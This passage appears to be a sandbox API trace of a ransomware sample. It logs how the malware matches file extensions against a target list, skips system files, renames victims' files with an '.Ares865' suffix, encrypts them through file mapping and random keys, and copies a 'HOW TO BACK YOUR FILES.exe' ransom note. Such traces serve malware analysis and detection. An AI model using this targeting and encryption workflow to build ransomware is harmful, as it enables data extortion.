lstrcmpiW (lpString1="rsm", lpString2="nv2") returned 1 [0074.287] lstrlenW (lpString="nwdb") returned 4 [0074.287] lstrcmpiW (lpString1=".rsm", lpString2="nwdb") returned -1 [0074.287] lstrlenW (lpString="nyf") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="nyf") returned 1 [0074.287] lstrlenW (lpString="odb") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0074.287] lstrlenW (lpString="odb") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0074.287] lstrlenW (lpString="oqy") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="oqy") returned 1 [0074.287] lstrlenW (lpString="ora") returned 3 [0074.287] lstrcmpiW (lpString1="rsm", lpString2="ora") returned 1 [0074.288] lstrlenW (lpString="orx") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="orx") returned 1 [0074.288] lstrlenW (lpString="owc") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="owc") returned 1 [0074.288] lstrlenW (lpString="p96") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="p96") returned 1 [0074.288] lstrlenW (lpString="p97") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="p97") returned 1 [0074.288] lstrlenW (lpString="pan") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="pan") returned 1 [0074.288] lstrlenW (lpString="pdb") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="pdb") returned 1 [0074.288] lstrlenW (lpString="pdm") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="pdm") returned 1 [0074.288] lstrlenW (lpString="pnz") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="pnz") returned 1 [0074.288] lstrlenW (lpString="qry") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="qry") returned 1 [0074.288] lstrlenW (lpString="qvd") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="qvd") returned 1 [0074.288] lstrlenW (lpString="rbf") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="rbf") returned 1 [0074.288] lstrlenW (lpString="rctd") returned 4 [0074.288] lstrcmpiW (lpString1=".rsm", lpString2="rctd") returned -1 [0074.288] lstrlenW (lpString="rod") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="rod") returned 1 [0074.288] lstrlenW (lpString="rodx") returned 4 [0074.288] lstrcmpiW (lpString1=".rsm", lpString2="rodx") returned -1 [0074.288] lstrlenW (lpString="rpd") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="rpd") returned 1 [0074.288] lstrlenW (lpString="rsd") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="rsd") returned 1 [0074.288] lstrlenW (lpString="sas7bdat") returned 8 [0074.288] lstrcmpiW (lpString1="tate.rsm", lpString2="sas7bdat") returned 1 [0074.288] lstrlenW (lpString="sbf") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="sbf") returned -1 [0074.288] lstrlenW (lpString="scx") returned 3 [0074.288] lstrcmpiW (lpString1="rsm", lpString2="scx") returned -1 [0074.289] lstrlenW (lpString="sdb") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="sdb") returned -1 [0074.289] lstrlenW (lpString="sdc") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="sdc") returned -1 [0074.289] lstrlenW (lpString="sdf") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="sdf") returned -1 [0074.289] lstrlenW (lpString="sis") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="sis") returned -1 [0074.289] lstrlenW (lpString="spq") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="spq") returned -1 [0074.289] lstrlenW (lpString="te") returned 2 [0074.289] lstrcmpiW (lpString1="sm", lpString2="te") returned -1 [0074.289] lstrlenW (lpString="teacher") returned 7 [0074.289] lstrcmpiW (lpString1="ate.rsm", lpString2="teacher") returned -1 [0074.289] lstrlenW (lpString="tmd") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="tmd") returned -1 [0074.289] lstrlenW (lpString="tps") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="tps") returned -1 [0074.289] lstrlenW (lpString="trc") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0074.289] lstrlenW (lpString="trc") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0074.289] lstrlenW (lpString="trm") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="trm") returned -1 [0074.289] lstrlenW (lpString="udb") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="udb") returned -1 [0074.289] lstrlenW (lpString="udl") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="udl") returned -1 [0074.289] lstrlenW (lpString="usr") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="usr") returned -1 [0074.289] lstrlenW (lpString="v12") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="v12") returned -1 [0074.289] lstrlenW (lpString="vis") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="vis") returned -1 [0074.289] lstrlenW (lpString="vpd") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="vpd") returned -1 [0074.289] lstrlenW (lpString="vvv") returned 3 [0074.289] lstrcmpiW (lpString1="rsm", lpString2="vvv") returned -1 [0074.289] lstrlenW (lpString="wdb") returned 3 [0074.290] lstrcmpiW (lpString1="rsm", lpString2="wdb") returned -1 [0074.290] lstrlenW (lpString="wmdb") returned 4 [0074.290] lstrcmpiW (lpString1=".rsm", lpString2="wmdb") returned -1 [0074.290] lstrlenW (lpString="wrk") returned 3 [0074.290] lstrcmpiW (lpString1="rsm", lpString2="wrk") returned -1 [0074.290] lstrlenW (lpString="xdb") returned 3 [0074.290] lstrcmpiW (lpString1="rsm", lpString2="xdb") returned -1 [0074.290] lstrlenW (lpString="xld") returned 3 [0074.290] lstrcmpiW (lpString1="rsm", lpString2="xld") returned -1 [0074.290] lstrlenW (lpString="xmlff") returned 5 [0074.290] lstrcmpiW (lpString1="e.rsm", lpString2="xmlff") returned -1 [0074.290] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.Ares865") returned 89 [0074.290] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.ares865"), dwFlags=0x1) returned 1 [0074.295] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.295] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=654) returned 1 [0074.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0074.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.296] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0074.296] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0074.296] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0074.296] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.297] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x590, lpName=0x0) returned 0x120 [0074.298] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x590) returned 0x190000 [0074.299] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0074.299] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0074.299] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0074.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0074.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0074.300] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0074.300] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0074.300] CloseHandle (hObject=0x120) returned 1 [0074.300] CloseHandle (hObject=0x118) returned 1 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0074.300] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0074.300] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0074.300] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="aoldtz.exe") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="..") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="windows") returned -1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="bootmgr") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="temp") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="pagefile.sys") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="boot") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="ids.txt") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="ntuser.dat") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="perflogs") returned 1 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2="MSBuild") returned 1 [0074.301] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0074.301] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned 81 [0074.301] lstrcpyW (in: lpString1=0x2cce490, lpString2="vcredist_x64.exe" | out: lpString1="vcredist_x64.exe") returned="vcredist_x64.exe" [0074.301] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0074.301] lstrlenW (lpString="Ares865") returned 7 [0074.301] lstrcmpiW (lpString1="x64.exe", lpString2="Ares865") returned 1 [0074.301] lstrlenW (lpString=".dll") returned 4 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".dll") returned 1 [0074.301] lstrlenW (lpString=".lnk") returned 4 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".lnk") returned 1 [0074.301] lstrlenW (lpString=".ini") returned 4 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".ini") returned 1 [0074.301] lstrlenW (lpString=".sys") returned 4 [0074.301] lstrcmpiW (lpString1="vcredist_x64.exe", lpString2=".sys") returned 1 [0074.301] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0074.301] lstrlenW (lpString="bak") returned 3 [0074.301] lstrcmpiW (lpString1="exe", lpString2="bak") returned 1 [0074.301] lstrlenW (lpString="ba_") returned 3 [0074.301] lstrcmpiW (lpString1="exe", lpString2="ba_") returned 1 [0074.301] lstrlenW (lpString="dbb") returned 3 [0074.301] lstrcmpiW (lpString1="exe", lpString2="dbb") returned 1 [0074.301] lstrlenW (lpString="vmdk") returned 4 [0074.301] lstrcmpiW (lpString1=".exe", lpString2="vmdk") returned -1 [0074.301] lstrlenW (lpString="rar") returned 3 [0074.301] lstrcmpiW (lpString1="exe", lpString2="rar") returned -1 [0074.301] lstrlenW (lpString="zip") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="zip") returned -1 [0074.302] lstrlenW (lpString="tgz") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="tgz") returned -1 [0074.302] lstrlenW (lpString="vbox") returned 4 [0074.302] lstrcmpiW (lpString1=".exe", lpString2="vbox") returned -1 [0074.302] lstrlenW (lpString="vdi") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="vdi") returned -1 [0074.302] lstrlenW (lpString="vhd") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="vhd") returned -1 [0074.302] lstrlenW (lpString="vhdx") returned 4 [0074.302] lstrcmpiW (lpString1=".exe", lpString2="vhdx") returned -1 [0074.302] lstrlenW (lpString="avhd") returned 4 [0074.302] lstrcmpiW (lpString1=".exe", lpString2="avhd") returned -1 [0074.302] lstrlenW (lpString="db") returned 2 [0074.302] lstrcmpiW (lpString1="xe", lpString2="db") returned 1 [0074.302] lstrlenW (lpString="db2") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="db2") returned 1 [0074.302] lstrlenW (lpString="db3") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="db3") returned 1 [0074.302] lstrlenW (lpString="dbf") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="dbf") returned 1 [0074.302] lstrlenW (lpString="mdf") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="mdf") returned -1 [0074.302] lstrlenW (lpString="mdb") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="mdb") returned -1 [0074.302] lstrlenW (lpString="sql") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="sql") returned -1 [0074.302] lstrlenW (lpString="sqlite") returned 6 [0074.302] lstrcmpiW (lpString1="64.exe", lpString2="sqlite") returned -1 [0074.302] lstrlenW (lpString="sqlite3") returned 7 [0074.302] lstrcmpiW (lpString1="x64.exe", lpString2="sqlite3") returned 1 [0074.302] lstrlenW (lpString="sqlitedb") returned 8 [0074.302] lstrcmpiW (lpString1="_x64.exe", lpString2="sqlitedb") returned -1 [0074.302] lstrlenW (lpString="xml") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="xml") returned -1 [0074.302] lstrlenW (lpString="$er") returned 3 [0074.302] lstrcmpiW (lpString1="exe", lpString2="$er") returned 1 [0074.302] lstrlenW (lpString="4dd") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="4dd") returned 1 [0074.303] lstrlenW (lpString="4dl") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="4dl") returned 1 [0074.303] lstrlenW (lpString="^^^") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="^^^") returned 1 [0074.303] lstrlenW (lpString="abs") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="abs") returned 1 [0074.303] lstrlenW (lpString="abx") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="abx") returned 1 [0074.303] lstrlenW (lpString="accdb") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accdb") returned -1 [0074.303] lstrlenW (lpString="accdc") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accdc") returned -1 [0074.303] lstrlenW (lpString="accde") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accde") returned -1 [0074.303] lstrlenW (lpString="accdr") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accdr") returned -1 [0074.303] lstrlenW (lpString="accdt") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accdt") returned -1 [0074.303] lstrlenW (lpString="accdw") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accdw") returned -1 [0074.303] lstrlenW (lpString="accft") returned 5 [0074.303] lstrcmpiW (lpString1="4.exe", lpString2="accft") returned -1 [0074.303] lstrlenW (lpString="adb") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0074.303] lstrlenW (lpString="adb") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="adb") returned 1 [0074.303] lstrlenW (lpString="ade") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="ade") returned 1 [0074.303] lstrlenW (lpString="adf") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="adf") returned 1 [0074.303] lstrlenW (lpString="adn") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="adn") returned 1 [0074.303] lstrlenW (lpString="adp") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="adp") returned 1 [0074.303] lstrlenW (lpString="alf") returned 3 [0074.303] lstrcmpiW (lpString1="exe", lpString2="alf") returned 1 [0074.304] lstrlenW (lpString="ask") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="ask") returned 1 [0074.304] lstrlenW (lpString="btr") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="btr") returned 1 [0074.304] lstrlenW (lpString="cat") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="cat") returned 1 [0074.304] lstrlenW (lpString="cdb") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="cdb") returned 1 [0074.304] lstrlenW (lpString="ckp") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="ckp") returned 1 [0074.304] lstrlenW (lpString="cma") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="cma") returned 1 [0074.304] lstrlenW (lpString="cpd") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="cpd") returned 1 [0074.304] lstrlenW (lpString="dacpac") returned 6 [0074.304] lstrcmpiW (lpString1="64.exe", lpString2="dacpac") returned -1 [0074.304] lstrlenW (lpString="dad") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="dad") returned 1 [0074.304] lstrlenW (lpString="dadiagrams") returned 10 [0074.304] lstrcmpiW (lpString1="st_x64.exe", lpString2="dadiagrams") returned 1 [0074.304] lstrlenW (lpString="daschema") returned 8 [0074.304] lstrcmpiW (lpString1="_x64.exe", lpString2="daschema") returned -1 [0074.304] lstrlenW (lpString="db-journal") returned 10 [0074.304] lstrcmpiW (lpString1="st_x64.exe", lpString2="db-journal") returned 1 [0074.304] lstrlenW (lpString="db-shm") returned 6 [0074.304] lstrcmpiW (lpString1="64.exe", lpString2="db-shm") returned -1 [0074.304] lstrlenW (lpString="db-wal") returned 6 [0074.304] lstrcmpiW (lpString1="64.exe", lpString2="db-wal") returned -1 [0074.304] lstrlenW (lpString="dbc") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="dbc") returned 1 [0074.304] lstrlenW (lpString="dbs") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="dbs") returned 1 [0074.304] lstrlenW (lpString="dbt") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="dbt") returned 1 [0074.304] lstrlenW (lpString="dbv") returned 3 [0074.304] lstrcmpiW (lpString1="exe", lpString2="dbv") returned 1 [0074.304] lstrlenW (lpString="dbx") returned 3 [0074.305] lstrcmpiW (lpString1="exe", lpString2="dbx") returned 1 [0074.305] lstrlenW (lpString="dcb") returned 3 [0074.305] lstrcmpiW (lpString1="exe", lpString2="dcb") returned 1 [0074.305] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.Ares865") returned 96 [0074.305] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.ares865"), dwFlags=0x1) returned 1 [0074.306] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.Ares865" (normalized: "c:\\users\\all users\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0074.306] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=455576) returned 1 [0074.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0074.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0074.306] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0074.306] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0074.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0074.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.307] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6f6a0, lpName=0x0) returned 0x120 [0074.309] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f6a0) returned 0x420000 [0074.353] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0074.354] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0074.354] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0074.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0074.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0074.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0074.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0074.354] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0074.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0074.354] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0074.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0074.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0074.355] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0074.355] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0074.359] CloseHandle (hObject=0x120) returned 1 [0074.359] CloseHandle (hObject=0x118) returned 1 [0074.359] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0074.359] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0074.359] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0074.362] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0074.362] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.362] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25e8 [0074.362] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0074.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2c90 | out: hHeap=0x2b0000) returned 1 [0074.362] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0074.362] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned 82 [0074.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030") returned="C:\\Users\\All Users\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030" [0074.362] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.362] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package 